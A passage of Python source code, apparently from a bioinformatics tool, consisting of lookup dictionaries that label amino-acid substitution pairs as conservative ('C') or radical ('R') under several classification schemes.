",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"C",("C","D"):"R",("Q","D"):"C",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"C",("C","E"):"R",("Q","E"):"C",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"R",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"R",("T","N"):"R",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"R",("T","C"):"R",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"C",("T","F"):"C",("W","F"):"R",("Y","F"):"R",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict4 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"C",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"C",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"C",("R","Y"):"C",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"C",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"C",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"C",("H","Y"):"C",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"C",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"C",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"C",("K","Y"):"C",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"R",("A","G"):"C",("A","I"):"R",("A","L"):"R",("A","M"):"R",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"R",("N","C"):"C",("N","Q"):"R",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"R",("C","Q"):"R",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"C",("Q","P"):"R",("Q","S"):"R",("Q","T"):"R",("Q","W"):"C",("Q","Y"):"C",("Q","V"):"R",("G","I"):"R",("G","L"):"R",("G","M"):"R",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"R",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"R",("I","S"):"R",("I","T"):"R",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"R",("L","S"):"R",("L","T"):"R",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"R",("M","S"):"R",("M","T"):"R",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"R",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"R",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"C",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"C",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"C",("Y","R"):"C",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"C",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"C",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"C",("Y","H"):"C",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"C",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"C",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"C",("Y","K"):"C",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"R",("G","A"):"C",("I","A"):"R",("L","A"):"R",("M","A"):"R",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"R",("C","N"):"C",("Q","N"):"R",("G","N"):"C",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"R",("Q","C"):"R",("G","C"):"C",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"C",("P","Q"):"R",("S","Q"):"R",("T","Q"):"R",("W","Q"):"C",("Y","Q"):"C",("V","Q"):"R",("I","G"):"R",("L","G"):"R",("M","G"):"R",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"R",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"R",("S","I"):"R",("T","I"):"R",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"R",("S","L"):"R",("T","L"):"R",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"R",("S","M"):"R",("T","M"):"R",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"R",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"R",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict5 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"C",("A","C"):"C",("A","Q"):"C",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"R",("A","P"):"C",("A","S"):"C",("A","T"):"C",("A","W"):"R",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"C",("N","L"):"C",("N","M"):"C",("N","F"):"R",("N","P"):"C",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"R",("N","V"):"C",("C","Q"):"C",("C","G"):"C",("C","I"):"C",("C","L"):"C",("C","M"):"C",("C","F"):"R",("C","P"):"C",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"R",("C","V"):"C",("Q","G"):"C",("Q","I"):"C",("Q","L"):"C",("Q","M"):"C",("Q","F"):"R",("Q","P"):"C",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"R",("Q","V"):"C",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"R",("G","P"):"C",("G","S"):"C",("G","T"):"C",("G","W"):"R",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"R",("I","P"):"C",("I","S"):"C",("I","T"):"C",("I","W"):"R",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"R",("L","P"):"C",("L","S"):"C",("L","T"):"C",("L","W"):"R",("L","Y"):"R",("L","V"):"C",("M","F"):"R",("M","P"):"C",("M","S"):"C",("M","T"):"C",("M","W"):"R",("M","Y"):"R",("M","V"):"C",("F","P"):"R",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"C",("F","V"):"R",("P","S"):"C",("P","T"):"C",("P","W"):"R",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"R",("S","V"):"R",("T","W"):"R",("T","Y"):"R",("T","V"):"C",("W","Y"):"C",("W","V"):"R",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"C",("C","A"):"C",("Q","A"):"C",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"R",("P","A"):"C",("S","A"):"C",("T","A"):"C",("W","A"):"R",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"C",("I","N"):"C",("L","N"):"C",("M","N"):"C",("F","N"):"R",("P","N"):"C",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"R",("V","N"):"C",("Q","C"):"C",("G","C"):"C",("I","C"):"C",("L","C"):"C",("M","C"):"C",("F","C"):"R",("P","C"):"C",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"R",("V","C"):"C",("G","Q"):"C",("I","Q"):"C",("L","Q"):"C",("M","Q"):"C",("F","Q"):"R",("P","Q"):"C",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"R",("V","Q"):"C",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"R",("P","G"):"C",("S","G"):"C",("T","G"):"C",("W","G"):"R",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"R",("P","I"):"C",("S","I"):"C",("T","I"):"C",("W","I"):"R",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"R",("P","L"):"C",("S","L"):"C",("T","L"):"C",("W","L"):"R",("Y","L"):"R",("V","L"):"C",("F","M"):"R",("P","M"):"C",("S","M"):"C",("T","M"):"C",("W","M"):"R",("Y","M"):"R",("V","M"):"C",("P","F"):"R",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"C",("V","F"):"R",("S","P"):"C",("T","P"):"C",("W","P"):"R",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"R",("V","S"):"R",("W","T"):"R",("Y","T"):"R",("V","T"):"C",("Y","W"):"C",("V","W"):"R",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict6 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"C",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"R",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"R",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","T"):"C",("C","W"):"R",("C","Y"):"C",("C","V"):"R",("Q","G"):"R",("Q","I"):"R",("Q","L"):"R",("Q","M"):"R",("Q","F"):"R",("Q","P"):"R",("Q","S"):"C",("Q","T"):"C",("Q","W"):"R",("Q","Y"):"C",("Q","V"):"R",("G","I"):"C",("G","L"):"C",("G","M"):"C",("G","F"):"C",("G","P"):"C",("G","S"):"R",("G","T"):"R",("G","W"):"C",("G","Y"):"R",("G","V"):"C",("I","L"):"C",("I","M"):"C",("I","F"):"C",("I","P"):"C",("I","S"):"R",("I","T"):"R",("I","W"):"C",("I","Y"):"R",("I","V"):"C",("L","M"):"C",("L","F"):"C",("L","P"):"C",("L","S"):"R",("L","T"):"R",("L","W"):"C",("L","Y"):"R",("L","V"):"C",("M","F"):"C",("M","P"):"C",("M","S"):"R",("M","T"):"R",("M","W"):"C",("M","Y"):"R",("M","V"):"C",("F","P"):"C",("F","S"):"R",("F","T"):"R",("F","W"):"C",("F","Y"):"R",("F","V"):"C",("P","S"):"R",("P","T"):"R",("P","W"):"C",("P","Y"):"R",("P","V"):"C",("S","T"):"C",("S","W"):"R",("S","Y"):"C",("S","V"):"R",("T","W"):"R",("T","Y"):"C",("T","V"):"R",("W","Y"):"R",("W","V"):"C",("Y","V"):"R",("H","R"):"C",("K","R"):"C",("D","R"):"R",("E","R"):"R",("A","R"):"R",("N","R"):"R",("C","R"):"R",("Q","R"):"R",("G","R"):"R",("I","R"):"R",("L","R"):"R",("M","R"):"R",("F","R"):"R",("P","R"):"R",("S","R"):"R",("T","R"):"R",("W","R"):"R",("Y","R"):"R",("V","R"):"R",("K","H"):"C",("D","H"):"R",("E","H"):"R",("A","H"):"R",("N","H"):"R",("C","H"):"R",("Q","H"):"R",("G","H"):"R",("I","H"):"R",("L","H"):"R",("M","H"):"R",("F","H"):"R",("P","H"):"R",("S","H"):"R",("T","H"):"R",("W","H"):"R",("Y","H"):"R",("V","H"):"R",("D","K"):"R",("E","K"):"R",("A","K"):"R",("N","K"):"R",("C","K"):"R",("Q","K"):"R",("G","K"):"R",("I","K"):"R",("L","K"):"R",("M","K"):"R",("F","K"):"R",("P","K"):"R",("S","K"):"R",("T","K"):"R",("W","K"):"R",("Y","K"):"R",("V","K"):"R",("E","D"):"C",("A","D"):"R",("N","D"):"R",("C","D"):"R",("Q","D"):"R",("G","D"):"R",("I","D"):"R",("L","D"):"R",("M","D"):
"R",("F","D"):"R",("P","D"):"R",("S","D"):"R",("T","D"):"R",("W","D"):"R",("Y","D"):"R",("V","D"):"R",("A","E"):"R",("N","E"):"R",("C","E"):"R",("Q","E"):"R",("G","E"):"R",("I","E"):"R",("L","E"):"R",("M","E"):"R",("F","E"):"R",("P","E"):"R",("S","E"):"R",("T","E"):"R",("W","E"):"R",("Y","E"):"R",("V","E"):"R",("N","A"):"R",("C","A"):"R",("Q","A"):"R",("G","A"):"C",("I","A"):"C",("L","A"):"C",("M","A"):"C",("F","A"):"C",("P","A"):"C",("S","A"):"R",("T","A"):"R",("W","A"):"C",("Y","A"):"R",("V","A"):"C",("C","N"):"C",("Q","N"):"C",("G","N"):"R",("I","N"):"R",("L","N"):"R",("M","N"):"R",("F","N"):"R",("P","N"):"R",("S","N"):"C",("T","N"):"C",("W","N"):"R",("Y","N"):"C",("V","N"):"R",("Q","C"):"C",("G","C"):"R",("I","C"):"R",("L","C"):"R",("M","C"):"R",("F","C"):"R",("P","C"):"R",("S","C"):"C",("T","C"):"C",("W","C"):"R",("Y","C"):"C",("V","C"):"R",("G","Q"):"R",("I","Q"):"R",("L","Q"):"R",("M","Q"):"R",("F","Q"):"R",("P","Q"):"R",("S","Q"):"C",("T","Q"):"C",("W","Q"):"R",("Y","Q"):"C",("V","Q"):"R",("I","G"):"C",("L","G"):"C",("M","G"):"C",("F","G"):"C",("P","G"):"C",("S","G"):"R",("T","G"):"R",("W","G"):"C",("Y","G"):"R",("V","G"):"C",("L","I"):"C",("M","I"):"C",("F","I"):"C",("P","I"):"C",("S","I"):"R",("T","I"):"R",("W","I"):"C",("Y","I"):"R",("V","I"):"C",("M","L"):"C",("F","L"):"C",("P","L"):"C",("S","L"):"R",("T","L"):"R",("W","L"):"C",("Y","L"):"R",("V","L"):"C",("F","M"):"C",("P","M"):"C",("S","M"):"R",("T","M"):"R",("W","M"):"C",("Y","M"):"R",("V","M"):"C",("P","F"):"C",("S","F"):"R",("T","F"):"R",("W","F"):"C",("Y","F"):"R",("V","F"):"C",("S","P"):"R",("T","P"):"R",("W","P"):"C",("Y","P"):"R",("V","P"):"C",("T","S"):"C",("W","S"):"R",("Y","S"):"C",("V","S"):"R",("W","T"):"R",("Y","T"):"C",("V","T"):"R",("Y","W"):"R",("V","W"):"C",("V","Y"):"R",("R","*"):"R",("H","*"):"R",("K","*"):"R",("D","*"):"R",("E","*"):"R",("A","*"):"R",("N","*"):"R",("C","*"):"R",("Q","*"):"R",("G","*"):"R",("I","*"):"R",("L","*"):"R",("M","*"):"R",("F","*"):"R",("P","*"):"R",("S","*"):"R",("T","*"):"R",("W","*"):"R",("Y","*"):"R",("V","*"):"R",("*","R"):"R",("*","H"):"R",("*","K"):"R",("*","D"):"R",("*","E"):"R",("*","A"):"R",("*","N"):"R",("*","C"):"R",("*","Q"):"R",("*","G"):"R",("*","I"):"R",("*","L"):"R",("*","M"):"R",("*","F"):"R",("*","P"):"R",("*","S"):"R",("*","T"):"R",("*","W"):"R",("*","Y"):"R",("*","V"):"R"}
aaSchemeDict7 = {("R","H"):"C",("R","K"):"C",("R","D"):"R",("R","E"):"R",("R","A"):"R",("R","N"):"R",("R","C"):"R",("R","Q"):"R",("R","G"):"R",("R","I"):"R",("R","L"):"R",("R","M"):"R",("R","F"):"R",("R","P"):"R",("R","S"):"R",("R","T"):"R",("R","W"):"R",("R","Y"):"R",("R","V"):"R",("H","K"):"C",("H","D"):"R",("H","E"):"R",("H","A"):"R",("H","N"):"R",("H","C"):"R",("H","Q"):"R",("H","G"):"R",("H","I"):"R",("H","L"):"R",("H","M"):"R",("H","F"):"R",("H","P"):"R",("H","S"):"R",("H","T"):"R",("H","W"):"R",("H","Y"):"R",("H","V"):"R",("K","D"):"R",("K","E"):"R",("K","A"):"R",("K","N"):"R",("K","C"):"R",("K","Q"):"R",("K","G"):"R",("K","I"):"R",("K","L"):"R",("K","M"):"R",("K","F"):"R",("K","P"):"R",("K","S"):"R",("K","T"):"R",("K","W"):"R",("K","Y"):"R",("K","V"):"R",("D","E"):"C",("D","A"):"R",("D","N"):"R",("D","C"):"R",("D","Q"):"R",("D","G"):"R",("D","I"):"R",("D","L"):"R",("D","M"):"R",("D","F"):"R",("D","P"):"R",("D","S"):"R",("D","T"):"R",("D","W"):"R",("D","Y"):"R",("D","V"):"R",("E","A"):"R",("E","N"):"R",("E","C"):"R",("E","Q"):"R",("E","G"):"R",("E","I"):"R",("E","L"):"R",("E","M"):"R",("E","F"):"R",("E","P"):"R",("E","S"):"R",("E","T"):"R",("E","W"):"R",("E","Y"):"R",("E","V"):"R",("A","N"):"R",("A","C"):"R",("A","Q"):"R",("A","G"):"R",("A","I"):"C",("A","L"):"C",("A","M"):"C",("A","F"):"C",("A","P"):"C",("A","S"):"R",("A","T"):"R",("A","W"):"C",("A","Y"):"R",("A","V"):"C",("N","C"):"C",("N","Q"):"C",("N","G"):"C",("N","I"):"R",("N","L"):"R",("N","M"):"R",("N","F"):"R",("N","P"):"R",("N","S"):"C",("N","T"):"C",("N","W"):"R",("N","Y"):"C",("N","V"):"R",("C","Q"):"C",("C","G"):"C",("C","I"):"R",("C","L"):"R",("C","M"):"R",("C","F"):"R",("C","P"):"R",("C","S"):"C",("C","